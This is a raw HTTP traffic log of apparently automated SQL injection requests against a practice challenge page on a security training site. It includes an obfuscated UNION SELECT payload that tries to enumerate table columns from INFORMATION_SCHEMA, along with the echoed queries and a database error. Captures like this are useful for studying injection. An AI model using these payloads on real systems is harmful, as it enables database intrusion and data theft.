HTTP request [#1]:
GET /sqli/chal2a.php?u=Steve%20Jobs HTTP/1.1
Cache-control: no-cache
User-agent: Mozilla/5.0 (X11; U; Linux i686; de; rv:1.8.0.12) Gecko/20070731 Ubuntu/dapper-security Firefox/1.5.0.12
Host: games.samsclass.info
Accept: */*
Accept-encoding: gzip,deflate
Connection: close

HTTP response [#1] (200 OK):
Date: Wed, 19 Apr 2023 18:49:19 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
Vary: Accept-Encoding
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=OnZlyqlJ5V%2Fi3FI0LfzSq1btdXqsvO%2FEmsVsgSXsL7HdgNYhzTAricpvAmNODxBiosmqSsAiWzH99jVaVfTBHxgnm%2BjJtk7kkbmCOdD3jvniRB5pkVhew7wqKVws8ORvmT8nP3KZdw%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 7ba753a61cb113ff-ORD
Content-Encoding: gzip
alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
URI: https://games.samsclass.info:443/sqli/chal2a.php?u=Steve%20Jobs

<html>
<head>
<title>Challenge 2a</title>
</head>
<body bgcolor="#ffffff" style="font-family:Arial">
<h1>Challenge 2a</h1>
<p>HTTP_CF_VISITOR: {"scheme":"https"}<p><h2>Executing This Query</h2>
<blockquote><b><big><code>SELECT name, id from employees WHERE name = 'Steve Jobs'</code></big></b></blockquote>
<h2>Result</h2>
<blockquote><b><big><code>
name: Steve Jobs<br>id: 2<br></code></big></b></blockquote>
</body>
</html>


############################################################################

HTTP request [#2]:
GET /sqli/chal2a.php?u=%3E%3D%2F%2A%2A%2F5.0.12 HTTP/1.1
Cache-control: no-cache
User-agent: Mozilla/5.0 (X11; U; Linux i686; de; rv:1.8.0.12) Gecko/20070731 Ubuntu/dapper-security Firefox/1.5.0.12
Host: games.samsclass.info
Accept: */*
Accept-encoding: gzip,deflate
Connection: close

HTTP response [#2] (200 OK):
Date: Wed, 19 Apr 2023 18:49:19 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
Vary: Accept-Encoding
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=VszT0OScdk3N%2FC%2FND2Hge8456chC0HVfXZq2rLbfyguMpk9iGWQz5gs2q0LVmLHM6k7uHoojIrv%2BkSQWrGlfcQakeFYbtUdfw5lbaPbT2mm4qO%2FZDsYcgYgMig4tJ%2Brjg3K0GAfPPA%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 7ba753a73f806332-ORD
Content-Encoding: gzip
alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
URI: https://games.samsclass.info:443/sqli/chal2a.php?u=%3E%3D%2F%2A%2A%2F5.0.12

<html>
<head>
<title>Challenge 2a</title>
</head>
<body bgcolor="#ffffff" style="font-family:Arial">
<h1>Challenge 2a</h1>
<p>HTTP_CF_VISITOR: {"scheme":"https"}<p><h2>Executing This Query</h2>
<blockquote><b><big><code>SELECT name, id from employees WHERE name = '>=/**/5.0.12'</code></big></b></blockquote>
<h2>Result</h2>
<blockquote><b><big><code>
</code></big></b></blockquote>
</body>
</html>


############################################################################

HTTP request [#3]:
GET /sqli/chal2a.php?u=Steve%2F%2A%2A%2FJobs%27%20uNioN%20alL%20SeLeCT%20NULl%2CCoNcat%280x716a706a71%2CjSon_aRrAYAGg%28CoNcat_WS%280x6d6e6d6c766a%2CcoLumN_NaMe%2Ccolumn_type%29%29%2C0x716b787171%29%20FRoM%20INFORMATION_SCHEMA.cOLumnS%20whErE%20tABle_nAMe%3D0x656d706c6f79656573%20AnD%20table_schema%20bEtweEN%200x776964676574733261%20AnD%200x776964676574733261%23 HTTP/1.1
Cache-control: no-cache
User-agent: Mozilla/5.0 (X11; U; Linux i686; de; rv:1.8.0.12) Gecko/20070731 Ubuntu/dapper-security Firefox/1.5.0.12
Host: games.samsclass.info
Accept: */*
Accept-encoding: gzip,deflate
Connection: close

HTTP response [#3] (200 OK):
Date: Wed, 19 Apr 2023 18:49:19 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
Vary: Accept-Encoding
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=8ATxT592363vVhnyJj0mbeAAjIfIWqZYhG3dcp%2BabSlan20MIMtFTO28d%2BLN3E4PTnHA3ld67cKGanaqlKnpsPOlLriG2kmKz%2BXcu5OztnX9Zsf2cfJeT%2Fj528gEoBRSvy5XknXpxw%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 7ba753a81e7529d0-ORD
Content-Encoding: gzip
alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
URI: https://games.samsclass.info:443/sqli/chal2a.php?u=Steve%2F%2A%2A%2FJobs%27%20uNioN%20alL%20SeLeCT%20NULl%2CCoNcat%280x716a706a71%2CjSon_aRrAYAGg%28CoNcat_WS%280x6d6e6d6c766a%2CcoLumN_NaMe%2Ccolumn_type%29%29%2C0x716b787171%29%20FRoM%20INFORMATION_SCHEMA.cOLumnS%20whErE%20tABle_nAMe%3D0x656d706c6f79656573%20AnD%20table_schema%20bEtweEN%200x776964676574733261%20AnD%200x776964676574733261%23

<html>
<head>
<title>Challenge 2a</title>
</head>
<body bgcolor="#ffffff" style="font-family:Arial">
<h1>Challenge 2a</h1>
<p>HTTP_CF_VISITOR: {"scheme":"https"}<p><h2>Executing This Query</h2>
<blockquote><b><big><code>SELECT name, id from employees WHERE name = 'Steve/**/Jobs' uNioN alL SeLeCT NULl,CoNcat(0x716a706a71,jSon_aRrAYAGg(CoNcat_WS(0x6d6e6d6c766a,coLumN_NaMe,column_type)),0x716b787171) FRoM INFORMATION_SCHEMA.cOLumnS whErE tABle_nAMe=0x656d706c6f79656573 AnD table_schema bEtweEN 0x776964676574733261 AnD 0x776964676574733261#'</code></big></b></blockquote>
<h2>Result</h2>
<blockquote><b><big><code>
FUNCTION widgets2a.jSon_aRrAYAGg does not exist

############################################################################

